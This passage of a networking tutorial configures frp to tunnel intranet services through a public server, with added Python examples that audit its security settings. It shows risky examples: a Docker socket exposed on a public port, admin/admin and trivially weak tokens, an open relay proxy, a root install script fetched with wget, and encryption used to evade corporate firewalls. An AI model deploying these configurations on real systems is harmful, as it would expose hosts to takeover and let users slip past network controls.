  • For the same http or https proxy, custom_domains and subdomain can be configured at the same time.

  • Note that if the frp server configures subdomain_host, custom_domains may not contain subdomains or wildcard domains of subdomain_host.

Modifying the Host header

Normally frp does not modify any forwarded data. But some backend services present different websites depending on the host field in the HTTP request header, for example nginx virtual hosts; enabling the host-header rewrite feature lets frp dynamically modify the host field of HTTP requests.

To enable this feature, only the host_header_rewrite parameter needs to be defined in the frp client configuration file.

$ vim frpc.ini
[web]
type = http
local_port = 80
custom_domains = test.hi-linux.com
host_header_rewrite = dev.hi-linux.com

The host field test.hi-linux.com in the original HTTP request is replaced with dev.hi-linux.com when the request is forwarded to the backend service.

  • This feature is limited to HTTP-type proxies.

URL routing

frp supports routing requests to different backend services according to the URL path. This is specified with the locations field in the frp client configuration file.

$ vim frpc.ini
[web01]
type = http
local_port = 80
custom_domains = web.hi-linux.com
locations = /
[web02]
type = http
local_port = 81
custom_domains = web.hi-linux.com
locations = /news,/about

With the configuration above, all requests under the domain web.hi-linux.com whose URL starts with /news or /about are forwarded to the backend service behind web02; the remaining requests are forwarded to the backend service behind web01.

  • Currently only longest-prefix matching is supported; regular-expression matching will be considered later.
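The three sections above (custom second-level domains, Host header rewriting and URL routing) all describe the same decision frps makes for every vhost HTTP request: which proxy owns the Host, and, when several do, which locations entry wins. The following is an added example, not frp's code and not from this tutorial, that models those rules in Python: a proxy serves the hosts in its custom_domains and, when subdomain_host is set, {subdomain}.{subdomain_host}; among proxies for a host, the locations entry that is the longest prefix of the request path wins (a proxy without locations matches every path); host_header_rewrite replaces the Host header sent to the backend. The proxy table and the requests are constructed here and mirror the [web01]/[web02] and [web] examples above; the prefix-only matching is the behaviour the text states, not a reading of frp's source.

```python
"""Model how frps chooses the backend for a vhost HTTP request.

Added example, not frp's own code. The proxy table and requests are
constructed from the examples on this page.
"""

SUBDOMAIN_HOST = "hi-linux.com"   # subdomain_host from the frps.ini example above

# Constructed proxy table, as frps would learn it from the clients' frpc.ini files.
PROXIES = [
    {"name": "web01", "custom_domains": ["web.hi-linux.com"], "locations": ["/"]},
    {"name": "web02", "custom_domains": ["web.hi-linux.com"], "locations": ["/news", "/about"]},
    {"name": "web", "subdomain": "test", "host_header_rewrite": "dev.hi-linux.com"},
]


def proxy_hosts(proxy, subdomain_host=SUBDOMAIN_HOST):
    """All host names a proxy answers for (custom_domains plus subdomain.subdomain_host)."""
    hosts = [h.lower() for h in proxy.get("custom_domains", [])]
    if proxy.get("subdomain") and subdomain_host:
        hosts.append(f"{proxy['subdomain']}.{subdomain_host}".lower())
    return hosts


def route(host_header, path, proxies=PROXIES):
    """Return (proxy name, Host header forwarded to the backend), or None if nothing matches."""
    host = host_header.split(":")[0].lower()   # drop any :port from the Host header
    best, best_len = None, -1
    for proxy in proxies:
        if host not in proxy_hosts(proxy):
            continue
        locations = proxy.get("locations") or ["/"]   # no locations: the proxy takes every path
        for loc in locations:
            # longest-prefix match, as the text says frp currently does
            if path.startswith(loc) and len(loc) > best_len:
                best, best_len = proxy, len(loc)
    if best is None:
        return None
    return best["name"], best.get("host_header_rewrite") or host


if __name__ == "__main__":
    for host, path in [("web.hi-linux.com", "/news/today"), ("web.hi-linux.com", "/index.html"),
                       ("test.hi-linux.com", "/"), ("other.hi-linux.com", "/")]:
        print(host, path, "->", route(host, path))
```

Because matching is plain prefix, a path such as /newsletter also lands on web02; if that is not intended, the locations list needs a more specific entry on web01, which is exactly the kind of check worth running before exposing two backends under one domain.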

Reaching intranet machines over UDP

DNS queries usually use the UDP protocol. frp supports penetration of intranet UDP services, and the configuration is almost the same as for TCP. Here forwarding to the UDP port of Google's DNS server 8.8.8.8 is used as the example.

First modify the frp client configuration file and add the following:

$ vim frpc.ini
[dns]
type = udp
local_ip = 8.8.8.8
local_port = 53
remote_port = 6001

  • To forward to an intranet DNS server, just change local_ip to the corresponding IP.

Next restart the frp client:

$ ./frpc -c ./frpc.ini
2018/01/25 14:54:17 [I] [proxy_manager.go:284] proxy removed: []
2018/01/25 14:54:17 [I] [proxy_manager.go:294] proxy added: [ssh web dns]
2018/01/25 14:54:17 [I] [proxy_manager.go:317] visitor removed: []
2018/01/25 14:54:17 [I] [proxy_manager.go:326] visitor added: []
2018/01/25 14:54:17 [I] [control.go:240] [33e1de8a771112a6] login to server success, get run id [33e1de8a771112a6], server udp port [0]
2018/01/25 14:54:17 [I] [control.go:165] [33e1de8a771112a6] [ssh] start proxy success
2018/01/25 14:54:17 [I] [control.go:165] [33e1de8a771112a6] [web] start proxy success
2018/01/25 14:54:17 [I] [control.go:165] [33e1de8a771112a6] [dns] start proxy success

Finally, test with the dig command whether UDP packet forwarding works; it should return the resolution result for www.google.com:

$ dig @4.3.2.1 -p 6001 www.google.com
...
;; QUESTION SECTION:
;www.google.com. IN A
;; ANSWER SECTION:
www.google.com. 79 IN A 69.63.184.30
...

Forwarding Unix domain sockets

Reach a Unix domain socket on the intranet through a TCP port; here communicating with the Docker daemon on the local machine is used as the example.

First modify the frp client configuration file and add the following:

$ vim frpc.ini
[unix_domain_socket]
type = tcp
remote_port = 6002
plugin = unix_domain_socket
plugin_unix_path = /var/run/docker.sock

The key here is the two parameters plugin and plugin_unix_path, which enable the unix_domain_socket plugin and configure the socket path it uses.

Next restart the frp client:

$ ./frpc -c ./frpc.ini
2018/01/25 15:09:33 [I] [proxy_manager.go:284] proxy removed: []
2018/01/25 15:09:33 [I] [proxy_manager.go:294] proxy added: [ssh web dns unix_domain_socket]
2018/01/25 15:09:33 [I] [proxy_manager.go:317] visitor removed: []
2018/01/25 15:09:33 [I] [proxy_manager.go:326] visitor added: []
2018/01/25 15:09:33 [I] [control.go:240] [f6424f0deb8b6ff7] login to server success, get run id [f6424f0deb8b6ff7], server udp port [0]
2018/01/25 15:09:33 [I] [control.go:165] [f6424f0deb8b6ff7] [ssh] start proxy success
2018/01/25 15:09:33 [I] [control.go:165] [f6424f0deb8b6ff7] [web] start proxy success
2018/01/25 15:09:33 [I] [control.go:165] [f6424f0deb8b6ff7] [dns] start proxy success
2018/01/25 15:09:33 [I] [control.go:165] [f6424f0deb8b6ff7] [unix_domain_socket] start proxy success

Finally, use curl to query the Docker version information as a test:

$ curl http://4.3.2.1:6002/version
{"Platform":{"Name":""},"Components":[{"Name":"Engine","Version":"17.12.0-ce","Details":{"ApiVersion":"1.35","Arch":"amd64","BuildTime":"2017-12-27T20:12:29.000000000+00:00","Experimental":"true","GitCommit":"c97c6d6","GoVersion":"go1.9.2","KernelVersion":"4.9.60-linuxkit-aufs","MinAPIVersion":"1.12","Os":"linux"}}],"Version":"17.12.0-ce","ApiVersion":"1.35","MinAPIVersion":"1.12","GitCommit":"c97c6d6","GoVersion":"go1.9.2","Os":"linux","Arch":"amd64","KernelVersion":"4.9.60-linuxkit-aufs","Experimental":true,"BuildTime":"2017-12-27T20:12:29.000000000+00:00"}

  • Starting with version 1.5, frp supports hot-reloading the client configuration file, so the client program no longer needs to be restarted every time. The specific method is in the section on hot-reloading the frp client configuration file below.

Advanced frp

Adding a Dashboard to the frp server

The Dashboard gives a convenient view of frp's status and proxy statistics. To use it, first specify in the frp server configuration file the port the Dashboard service uses:

$ vim frps.ini
[common]
# IP address the Dashboard listens on
dashboard_addr = 0.0.0.0
# port the Dashboard listens on
dashboard_port = 7500
# username for accessing the Dashboard
dashboard_user = admin
# password for accessing the Dashboard
dashboard_pwd = admin

Next restart the frp server:

$ ./frps -c ./frps.ini
2018/01/25 16:39:29 [I] [service.go:96] frps tcp listen on 0.0.0.0:7000
2018/01/25 16:39:29 [I] [service.go:125] http service listen on 0.0.0.0:8080
2018/01/25 16:39:29 [I] [service.go:164] Dashboard listen on 0.0.0.0:7500
2018/01/25 16:39:29 [I] [main.go:112] Start frps success
2018/01/25 16:39:29 [I] [main.go:114] PrivilegeMode is enabled, you should pay more attention to security issues

Finally, visit http://[server_addr]:7500 for the Dashboard interface; the default username and password are both admin.

[Figure 8: FRP Dashboard overview]

[Figure 9: FRP Dashboard proxy statistics]

Adding authentication to the FRP server

By default, anyone who knows the port the FRP server listens on can connect an FRP client and register arbitrary port mappings on it, which is clearly unsafe for a server on the public internet. FRP provides an authentication mechanism to improve the security of the server side. Enabling it is simple: set the same privilege_token parameter in the [common] section of both the FRP server and the FRP client.

```ini
[common]
privilege_token = 12345678
```

Once enabled, a client can only register port mappings with the server if the privilege_token in its [common] section matches the server's. Otherwise registration fails with an error like the following:

```text
2018/01/25 17:29:27 [I] [proxy_manager.go:284] proxy removed: []
2018/01/25 17:29:27 [I] [proxy_manager.go:294] proxy added: [ssh web dns unix_domain_socket]
2018/01/25 17:29:27 [I] [proxy_manager.go:317] visitor removed: []
2018/01/25 17:29:27 [I] [proxy_manager.go:326] visitor added: []
2018/01/25 17:29:27 [E] [control.go:230] authorization failed
2018/01/25 17:29:27 [W] [control.go:109] login to server failed: authorization failed
authorization failed
```

The token is a shared secret, not a password typed by a human, so use a long random value rather than the eight digits shown above. Note also that later FRP releases renamed this parameter to token (and to auth.token in the TOML configuration format); the mechanism is the same.

Note that the clocks of the FRP client machine and the FRP server machine must not differ by more than 15 minutes, because the timestamp is part of the cryptographic check that prevents a captured authentication packet from being replayed by someone else. This window is set by the authentication_timeout parameter in the server configuration file, in seconds; the default is 900, i.e. 15 minutes. If it is set to 0, the FRP server performs no timestamp check on authentication packets at all, which re-enables replay of captured login packets and should be avoided.
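The check described above can be reproduced without running frp. The following is an added example written for this page, not frp's own code: it re-implements the login-key derivation frp uses (hex MD5 over the token concatenated with the decimal timestamp) and the server-side timestamp window, then shows why a captured login packet stops working after authentication_timeout and why setting the timeout to 0 brings replay back. The token, timestamps and function names are constructed for the example.

```python
import hashlib
import hmac
import time
from typing import Optional, Tuple


def auth_key(token: str, timestamp: int) -> str:
    """Login key as frp derives it: hex(MD5(token || decimal timestamp))."""
    return hashlib.md5(f"{token}{timestamp}".encode()).hexdigest()


def verify_login(server_token: str, timestamp: int, key: str,
                 now: Optional[int] = None,
                 authentication_timeout: int = 900) -> Tuple[bool, str]:
    """Server-side check of one login packet. Returns (accepted, reason).

    authentication_timeout mirrors the frps.ini setting: the clock skew, in
    seconds, tolerated in either direction. 0 disables the window entirely.
    """
    now = int(time.time()) if now is None else now
    if authentication_timeout != 0 and abs(now - timestamp) > authentication_timeout:
        return False, "authorization failed: timestamp outside authentication_timeout"
    expected = auth_key(server_token, timestamp)
    # Constant-time comparison so a wrong key cannot be measured byte by byte.
    if not hmac.compare_digest(expected, key):
        return False, "authorization failed: bad token"
    return True, "ok"


def demo() -> dict:
    """Constructed scenario: one genuine login packet seen by the server,
    then the same packet replayed half an hour later."""
    token = "12345678"          # the weak example token from the tutorial
    now = 1516901367            # fixed "server clock" so the result is reproducible
    ts = now - 30               # client clock 30 s behind the server: fine
    key = auth_key(token, ts)   # what the real client would send
    return {
        "fresh":       verify_login(token, ts, key, now)[0],
        "wrong_token": verify_login("not-the-token", ts, key, now)[0],
        "replayed":    verify_login(token, ts, key, now + 1800)[0],
        "no_window":   verify_login(token, ts, key, now + 1800,
                                    authentication_timeout=0)[0],
    }


if __name__ == "__main__":
    for case, accepted in demo().items():
        print(f"{case:12s} accepted={accepted}")
```

The "no_window" case is the one to remember: with authentication_timeout = 0 the replayed packet is accepted, so anyone who sniffed one login (the control channel is plain TCP unless TLS is enabled) could register proxies on the server indefinitely.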

Hot reloading the FRP client configuration file

Since v0.15, after the FRP client configuration file has been modified it can be reloaded dynamically with the frpc reload command; the proxies are normally updated within 10 seconds.

This requires enabling the admin port in the FRP client configuration file, which provides the API used by the command. The configuration is:

$ vim frpc.ini

```ini
[common]
admin_addr = 127.0.0.1
admin_port = 7400
```

Restart the FRP client; after that, configuration changes can be applied by hot reload.

```text
$ ./frpc -c ./frpc.ini
2018/01/25 18:04:25 [I] [proxy_manager.go:326] visitor added: []
2018/01/25 18:04:25 [I] [control.go:240] [3653b9a878f8acc7] login to server success, get run id [3653b9a878f8acc7], server udp port [0]
2018/01/25 18:04:25 [I] [service.go:49] admin server listen on 127.0.0.1:7400
2018/01/25 18:04:25 [I] [control.go:165] [3653b9a878f8acc7] [ssh] start proxy success
2018/01/25 18:04:25 [I] [control.go:165] [3653b9a878f8acc7] [web] start proxy success
2018/01/25 18:04:25 [I] [control.go:165] [3653b9a878f8acc7] [dns] start proxy success
2018/01/25 18:04:25 [I] [control.go:165] [3653b9a878f8acc7] [unix_domain_socket] start proxy success

$ ./frpc reload -c ./frpc.ini
reload success
```

After a short wait the client creates, updates and deletes proxies according to the new configuration file.

  • Note that the parameters in [common] cannot currently be changed by reload; they only take effect at startup.

Keep admin_addr on 127.0.0.1 as shown: the admin API can reload the configuration and reports every proxy, so it must not be reachable from other hosts.

Once admin_addr is enabled, the command frpc status -c ./frpc.ini conveniently shows the current status of each proxy on the FRP client.

```text
$ ./frpc status -c ./frpc.ini
Proxy Status...
TCP
Name                Status   LocalAddr     Plugin              RemoteAddr    Error
ssh                 running  127.0.0.1:22                      4.3.2.1:6000
unix_domain_socket  running                unix_domain_socket  4.3.2.1:6002
UDP
Name                Status   LocalAddr     Plugin              RemoteAddr    Error
dns                 running  8.8.8.8:53                        4.3.2.1:6001
HTTP
Name                Status   LocalAddr     Plugin              RemoteAddr                Error
web                 running  127.0.0.1:80                      mike.hi-linux.com:8080
```

Adding a port whitelist to the FRP server

To keep the FRP server's ports from being abused, FRP can restrict which remote ports clients are allowed to claim. This is set with the privilege_allow_ports parameter in the FRP server configuration file:

$ vim frps.ini

```ini
[common]
privilege_allow_ports = 2000-3000,3001,3003,4000-5000
```

privilege_allow_ports accepts single ports and port ranges, separated by commas; a range is written with a hyphen between its two ends. (Newer FRP releases call this parameter allow_ports.)

When a client tries to register a port that is not allowed, registration fails with an error like the following:

```text
$ ./frpc status -c ./frpc.ini
Proxy Status...
TCP
Name                Status       LocalAddr     Plugin              RemoteAddr     Error
ssh                 start error  127.0.0.1:22                      4.3.2.1:60000  port not allowed
unix_domain_socket  start error                unix_domain_socket  4.3.2.1:60002  port not allowed
```
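The Dashboard, authentication and whitelist settings above are the three knobs that decide whether a public frps is safe to leave running. The following added example (written for this page; it is not part of frp) parses the allow-ports syntax exactly as the whitelist section describes it, decides whether a requested remote port such as 60000 would be rejected, and audits an frps.ini for the weak values the tutorial uses. The sample INI text, and the names parse_allow_ports, port_allowed and audit_frps, are constructed for the example.

```python
import configparser
from typing import List, Tuple

# Constructed sample: the frps.ini as assembled in the sections above,
# including the weak example values (default dashboard password, 8-digit token).
SAMPLE_FRPS_INI = """
[common]
bind_port = 7000
dashboard_addr = 0.0.0.0
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = admin
privilege_token = 12345678
privilege_allow_ports = 2000-3000,3001,3003,4000-5000
"""


def parse_allow_ports(spec: str) -> List[Tuple[int, int]]:
    """Parse frp's allow-ports syntax: comma-separated ports and lo-hi ranges.
    Single ports become (p, p). Malformed or out-of-range entries raise."""
    ranges: List[Tuple[int, int]] = []
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        if "-" in item:
            lo, hi = (int(x) for x in item.split("-", 1))
        else:
            lo = hi = int(item)
        if not (1 <= lo <= hi <= 65535):
            raise ValueError(f"bad port spec: {item!r}")
        ranges.append((lo, hi))
    return ranges


def port_allowed(port: int, ranges: List[Tuple[int, int]]) -> bool:
    """Would frps accept a proxy asking for this remote port?"""
    return any(lo <= port <= hi for lo, hi in ranges)


def audit_frps(ini_text: str) -> List[str]:
    """Return a list of findings for the [common] section of an frps.ini."""
    cp = configparser.ConfigParser()
    cp.read_string(ini_text)
    c = cp["common"]
    findings: List[str] = []

    # Old and new names for the same settings.
    token = c.get("token") or c.get("privilege_token")
    if not token:
        findings.append("no token: any frpc can register proxies")
    elif len(token) < 16 or token.isdigit():
        findings.append("weak token: use a long random value")

    if c.get("dashboard_port"):
        # frp binds the dashboard to 0.0.0.0 when dashboard_addr is absent.
        if c.get("dashboard_addr", "0.0.0.0") == "0.0.0.0":
            findings.append("dashboard bound to 0.0.0.0: bind to 127.0.0.1 or firewall it")
        if c.get("dashboard_pwd") in (None, "", "admin"):
            findings.append("dashboard uses default/empty password")

    spec = c.get("allow_ports") or c.get("privilege_allow_ports")
    if not spec:
        findings.append("no allow_ports: clients may claim any remote port")
    else:
        parse_allow_ports(spec)  # raises on a malformed whitelist
    return findings


if __name__ == "__main__":
    allowed = parse_allow_ports("2000-3000,3001,3003,4000-5000")
    for p in (2500, 3003, 6000, 60000):
        print(f"remote_port {p}: {'allowed' if port_allowed(p, allowed) else 'port not allowed'}")
    for f in audit_frps(SAMPLE_FRPS_INI):
        print("finding:", f)
```

Run against the sample it reports three findings (weak token, dashboard on 0.0.0.0, default password) and confirms that 6000 and 60000, the ports the earlier examples used, are rejected by this whitelist, which is exactly why the status output above shows "port not allowed".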

Enabling TCP multiplexing

Since v0.10.0 the connection between client and server supports multiplexing, so a new connection no longer has to be created for every user request. This lowers connection-setup latency and avoids consuming large numbers of file descriptors, letting FRP handle higher concurrency.

The feature is enabled by default. To turn it off, set the option in both the FRP server and the FRP client configuration files; the value must be the same on both sides:

```ini
# in both frps.ini and frpc.ini
[common]
tcp_mux = false
```

Enabling the KCP protocol for FRP's underlying transport

Since v0.12.0, FRP can use the KCP protocol as its underlying transport. On lossy or high-latency networks this noticeably improves transfer efficiency, at the cost of some extra traffic.

To enable KCP, first turn on KCP support in the FRP server configuration file:

$ vim frps.ini

```ini
[common]
bind_port = 7000
# UDP port used to receive KCP client connections; since KCP runs over UDP,
# this can be the same number as bind_port
kcp_bind_port = 7000
```

Then set the protocol type in the FRP client configuration file; currently only tcp and kcp are supported. The proxy sections themselves need no change:

$ vim frpc.ini

```ini
[common]
server_addr = 4.3.2.1
# server_port must be the kcp_bind_port configured on the FRP server
server_port = 7000
# transport protocol to use; the default is tcp
protocol = kcp
```

  • Remember to open the corresponding UDP port on the relevant machines and firewalls.

Configuring a connection pool for the FRP server

By default, only when a user request arrives does the FRP server ask the FRP client to establish a connection to the backend service.

When the connection pool is enabled for a proxy, FRP establishes the specified number of connections to the backend service in advance. Each time a user request is received, one connection is taken from the pool and paired with the user connection, which avoids both the wait for a backend connection to be established and the round trip of control messages between the FRP client and the FRP server.

First set, in the FRP server configuration file, the upper limit of connections each proxy may pool, to avoid excessive resource consumption; a client that asks for more is clamped to this value:

$ vim frps.ini

```ini
[common]
max_pool_count = 5
```

Then enable pooling in the FRP client configuration file by specifying the number of connections to pre-create:

$ vim frpc.ini

```ini
[common]
pool_count = 1
```

  • This feature is useful when a service receives many short-lived connection requests.

Encryption and compression

If the corporate intranet firewall identifies and blocks certain outbound protocols, for example SSH, setting use_encryption = true encrypts the content exchanged between the FRP client and the FRP server, so that inspection equipment can no longer recognise the tunnelled protocol and block it. Note the scope of this: the proxied payload is encrypted with a key derived from the shared token, and an observer can still see that an FRP connection exists; it is not a substitute for TLS on the control connection.

If the transmitted messages are long, setting use_compression = true compresses the content, which effectively reduces network traffic between the FRP client and the FRP server and speeds up forwarding, at the cost of some extra CPU.

Both features are off by default and are enabled per proxy in the FRP client configuration file; the compression algorithm is snappy.

$ vim frpc.ini

```ini
[ssh]
type = tcp
local_port = 22
remote_port = 6000
use_encryption = true
use_compression = true
```

Letting other intranet machines reach the internet through the FRP client

The FRP client has built-in http_proxy and socks5 plugins. With them, other machines on the intranet can reach the internet through the network of the machine running the FRP client.

To enable this, first turn on the relevant plugin in the FRP client configuration file; http_proxy is used as the example here:

$ vim frpc.ini

```ini
[common]
server_addr = 4.3.2.1
server_port = 7000

[http_proxy]
type = tcp
remote_port = 6000
plugin = http_proxy
```

Then set the proxy address of the intranet machines that should reach the internet this way to 4.3.2.1:6000, and their traffic will leave through the FRP client machine's network.

Be aware that this configuration publishes an open HTTP proxy on the public server at 4.3.2.1:6000: anyone on the internet who finds the port can relay traffic through your intranet machine, and that traffic will carry its address. Always enable the plugin's authentication (next bullet), and prefer exposing such a proxy through STCP rather than a public remote_port.

  • The http_proxy plugin also supports authentication; enable it with the plugin_http_user and plugin_http_passwd parameters.

  • To use a SOCKS5 proxy instead, simply change the value of plugin to socks5; its credentials are set with plugin_user and plugin_passwd.

Connecting to the FRP server through a proxy

In an environment where the internet is only reachable through a proxy, the FRP client can be told to talk to the FRP server through that proxy. Either set the HTTP_PROXY environment variable or set the http_proxy parameter in the FRP client configuration file:

$ vim frpc.ini

```ini
[common]
server_addr = 4.3.2.1
server_port = 7000
protocol = tcp
http_proxy = http://user:pwd@4.3.2.2:8080
```

  • This only takes effect when protocol = tcp; the kcp protocol is not supported for now.

Exposing intranet services securely

Some services are too sensitive to be exposed directly on the public internet. For these, FRP provides a secure forwarding mode called STCP (secret tcp). An STCP proxy avoids making the tunnelled intranet service reachable by anyone who can reach the public server; instead, the visitor must run a second FRP client that presents the same secret key. The service still passes through the FRP server (frps relays the bytes), so the secret key sk is the only thing gating access: generate a long random value, never reuse the example below, and combine it with use_encryption for anything sensitive.

The example below creates an SSH proxy that only you can reach. The FRP server and the other deployment steps are unchanged; the difference is on the FRP client side.

First configure the FRP client on the intranet machine. Unlike regular TCP forwarding, no remote port is specified here.

$ vim frpc.ini

```ini
[common]
server_addr = 4.3.2.1
server_port = 7000

[secret_ssh]
type = stcp
# only visitors presenting the same sk can reach this service
sk = abcdefg
local_ip = 127.0.0.1
local_port = 22
```

Then, on the machine from which you want to reach the service, start another FRP client with this configuration:

$ vim frpc.ini

```ini
[common]
server_addr = 4.3.2.1
server_port = 7000

[secret_ssh_visitor]
type = stcp
# this side is the STCP visitor
role = visitor
# name of the STCP proxy to reach, as defined above
server_name = secret_ssh
# must match the sk defined above
sk = abcdefg
# local port bound for reaching the ssh service
bind_addr = 127.0.0.1
bind_port = 6005
```

Finally start the visitor FRP client, after which port 6005 on this machine leads to the SSH service of the intranet machine; assuming the username is mike:

```text
$ ./frpc -c ./frpc.ini
2018/01/26 15:03:24 [I] [proxy_manager.go:284] proxy removed: []
2018/01/26 15:03:24 [I] [proxy_manager.go:294] proxy added: []
2018/01/26 15:03:24 [I] [proxy_manager.go:317] visitor removed: []
2018/01/26 15:03:24 [I] [proxy_manager.go:326] visitor added: [secret_ssh_visitor]
2018/01/26 15:03:24 [I] [control.go:240] [60d2af2f68196537] login to server success, get run id [60d2af2f68196537], server udp port [0]
2018/01/26 15:03:24 [I] [proxy_manager.go:235] [60d2af2f68196537] try to start visitor [secret_ssh_visitor]
2018/01/26 15:03:24 [I] [proxy_manager.go:243] [secret_ssh_visitor] start visitor success

$ ssh -oPort=6005 mike@127.0.0.1
```

Point-to-point intranet penetration

When large amounts of data always pass through the server, the server's bandwidth comes under heavy pressure. FRP offers another proxy type, XTCP, to solve this: in XTCP mode, bulk data flows directly between the two ends without going through the server.

Usage is similar to STCP: an FRP client is deployed on each end of the transfer and they establish a direct connection.

First add a UDP port to the FRP server configuration to support this client type:

$ vim frps.ini

```ini
bind_udp_port = 7001
```

Then configure the FRP client on the intranet machine. Unlike regular TCP forwarding, no remote port is specified here.

$ vim frpc.ini

```ini
[common]
server_addr = 4.3.2.1
server_port = 7000

[p2p_ssh]
type = xtcp
# only visitors presenting the same sk can reach this service
sk = abcdefg
local_ip = 127.0.0.1
local_port = 22
```

Then, on the machine from which you want to reach the service, start another FRP client with this configuration:

$ vim frpc.ini

```ini
[common]
server_addr = 4.3.2.1
server_port = 7000

[p2p_ssh_visitor]
type = xtcp
# this side is the XTCP visitor
role = visitor
# name of the XTCP proxy to reach
server_name = p2p_ssh
sk = abcdefg
# local port bound for reaching the ssh service
bind_addr = 127.0.0.1
bind_port = 6006
```

Finally start the visitor FRP client, after which port 6006 on this machine leads to the SSH service of the intranet machine; assuming the username is mike:

```text
$ ./frpc -c ./frpc.ini
2018/01/26 16:01:52 [I] [proxy_manager.go:326] visitor added: [p2p_ssh_visitor secret_ssh_visitor]
2018/01/26 16:01:52 [I] [control.go:240] [7c7e06878e11cc3c] login to server success, get run id [7c7e06878e11cc3c], server udp port [7001]
2018/01/26 16:01:52 [I] [proxy_manager.go:235] [7c7e06878e11cc3c] try to start visitor [p2p_ssh_visitor]
2018/01/26 16:01:52 [I] [proxy_manager.go:243] [p2p_ssh_visitor] start visitor success
2018/01/26 16:01:52 [I] [proxy_manager.go:235] [7c7e06878e11cc3c] try to start visitor [secret_ssh_visitor]
2018/01/26 16:01:52 [I] [proxy_manager.go:243] [secret_ssh_visitor] start visitor success

$ ssh -oPort=6006 mike@127.0.0.1
```

  • XTCP mode is still at an early stage of development and cannot traverse every type of NAT device, so its success rate is low. When hole punching fails, fall back to STCP.

FRP management

Deploying and installing FRP is fairly simple, and the project itself does not ship a management script. Fortunately, open-source projects always attract users who contribute deployment and management scripts. If manual deployment feels too cumbersome, the one-click installation script below can be used instead.

Project address: https://github.com/clangcn/onekey-install-shell/

Downloading the one-click deployment script

```bash
$ wget https://raw.githubusercontent.com/clangcn/onekey-install-shell/master/frps/install-frps.sh -O ./install-frps.sh
$ chmod 700 ./install-frps.sh
```

Fetch it over verified HTTPS (the original command passed --no-check-certificate, which defeats the point of HTTPS) and read the script before running it: it executes as root, installs an init script and writes the server configuration, so it is third-party code you are trusting with the whole host.

Installing the FRP server

The one-click script is straightforward. To speed up downloads for users in China it also offers an Alibaba Cloud mirror as the installation source. The commonly used FRP server settings are all chosen interactively, so users can pick values for their situation, and the script detects the public IP address of the server, saving manual input.

```text
$ ./install-frps.sh install
Please select frps download url:
[1].aliyun (default)
[2].github
Enter your choice (1, 2 or exit. default [aliyun]):
---------------------------------------
Your select: aliyun
---------------------------------------
Loading network version for frps, please wait...
frps Latest release file frp_0.15.1_linux_amd64.tar.gz
Loading You Server IP, please wait...
You Server IP:12.34.56.78
Please input your server setting:

Please input frps bind_port [1-65535](Default Server Port: 5443):7000
frps bind_port: 7000
Please input frps vhost_http_port [1-65535](Default vhost_http_port: 80):8080
frps vhost_http_port: 8080
Please input frps vhost_https_port [1-65535](Default vhost_https_port: 443):
frps vhost_https_port: 443
Please input frps dashboard_port [1-65535](Default dashboard_port: 6443):7500
frps dashboard_port: 7500
Please input dashboard_user (Default: admin):
frps dashboard_user: admin
Please input dashboard_pwd (Default: IY0p1bOg):admin
frps dashboard_pwd: admin
Please input privilege_token (Default: 9BqswPpd1R0TfGR5):mike
frps privilege_token: mike
Please input frps max_pool_count [1-200](Default max_pool_count: 50):
frps max_pool_count: 50
##### Please select log_level #####
1: info (default)
2: warn
3: error
4: debug
#####################################################
Enter your choice (1, 2, 3, 4 or exit. default [1]):
log_level: info
Please input frps log_max_days [1-30](Default log_max_days: 3 day):
frps log_max_days: 3
##### Please select log_file #####
1: enable (default)
2: disable
#####################################################
Enter your choice (1, 2 or exit. default [1]):
log_file: enable
##### Please select tcp_mux #####
1: enable (default)
2: disable
#####################################################
Enter your choice (1, 2 or exit. default [1]):
tcp_mux: true
##### Please select kcp support #####
1: enable (default)
2: disable
#####################################################
Enter your choice (1, 2 or exit. default [1]):
kcp support: true
============== Check your input ==============
You Server IP      : 12.34.56.78
Bind port          : 7000
kcp support        : true
vhost http port    : 8080
vhost https port   : 443
Dashboard port     : 7500
Dashboard user     : admin
Dashboard password : admin
Privilege token    : mike
tcp_mux            : true
Max Pool count     : 50
Log level          : info
Log max days       : 3
Log file           : enable
==============================================
Press any key to start...or Press Ctrl+c to cancel
frps install path:/usr/local/frps
config file for frps ... done
download frps ... done
download /etc/init.d/frps... done
setting frps boot... done
+--------------------------------------------------+
| Manager for Frps, Written by Clang               |
+--------------------------------------------------+
| Intro: http://koolshare.cn/thread-65379-1-1.html |
+--------------------------------------------------+
Starting Frps(0.15.1)... done
Frps (pid 3325)is running.
+---------------------------------------------------------+
| frps for Linux Server, Written by Clang                 |
+---------------------------------------------------------+
| A tool to auto-compile & install frps on Linux          |
+---------------------------------------------------------+
| Intro: http://koolshare.cn/thread-65379-1-1.html        |
+---------------------------------------------------------+
Congratulations, frps install completed!
==============================================
You Server IP      : 12.34.56.78
Bind port          : 7000
KCP support        : true
vhost http port    : 8080
vhost https port   : 443
Dashboard port     : 7500
Privilege token    : mike
tcp_mux            : true
Max Pool count     : 50
Log level          : info
Log max days       : 3
Log file           : enable
==============================================
frps Dashboard     : http://12.34.56.78:7500/
Dashboard user     : admin
Dashboard password : admin
==============================================
```

Note what happened at the two prompts that matter: the script offered a random dashboard password (IY0p1bOg) and a random privilege_token (9BqswPpd1R0TfGR5), and the transcript overrides both with admin and mike. Accept the generated defaults, or supply your own long random values; a four-letter token on a public server is guessable.

Configuring the FRP server

```bash
$ ./install-frps.sh config
```

Updating the FRP server

```bash
$ ./install-frps.sh update
```

Uninstalling the FRP server

```bash
$ ./install-frps.sh uninstall
```

Day-to-day management of the FRP server

After the FRP server is installed, the one-click deployment script also provides an init script for routine management of the server: start, restart, stop and so on.

```text
Usage: /etc/init.d/frps {start|stop|restart|status|config|version}
```

Five permanently free intranet penetration services, beginner-friendly

Source: https://www.cnblogs.com/liyangit-bky/articles/13993007.html

Free intranet penetration

From: https://zhuanlan.zhihu.com/p/339923535

If you do not want to pay but need more than two mappings, combining Peanut Shell (花生壳) and NATAPP may be a good choice.

1. WeNAT

Advantages:

  • no payment required
  • no registration required
  • no traffic limit
  • works out of the box

Official site: https://www.wezoz.com (temporarily closed at the moment, but this does not affect the tunnelling itself)

Client download: wenat-client.jar

How to use:

  • A Java runtime is required; it can be downloaded from https://www.java.com/zh-CN/download.
  • Open the WeNAT client, enter the domain name and set the forwarding address.
  • Click "start service".

[Figure 10: WeNAT client]

2. Peanut Shell (花生壳)

Advantages:

  • a free domain name is included
  • two free mappings
  • 1 GB of free traffic per month

Official site: https://hsk.oray.com

Client download: https://hsk.oray.com/download

How to use:

  • register an account
  • download the client and log in
  • create a new mapping and save it

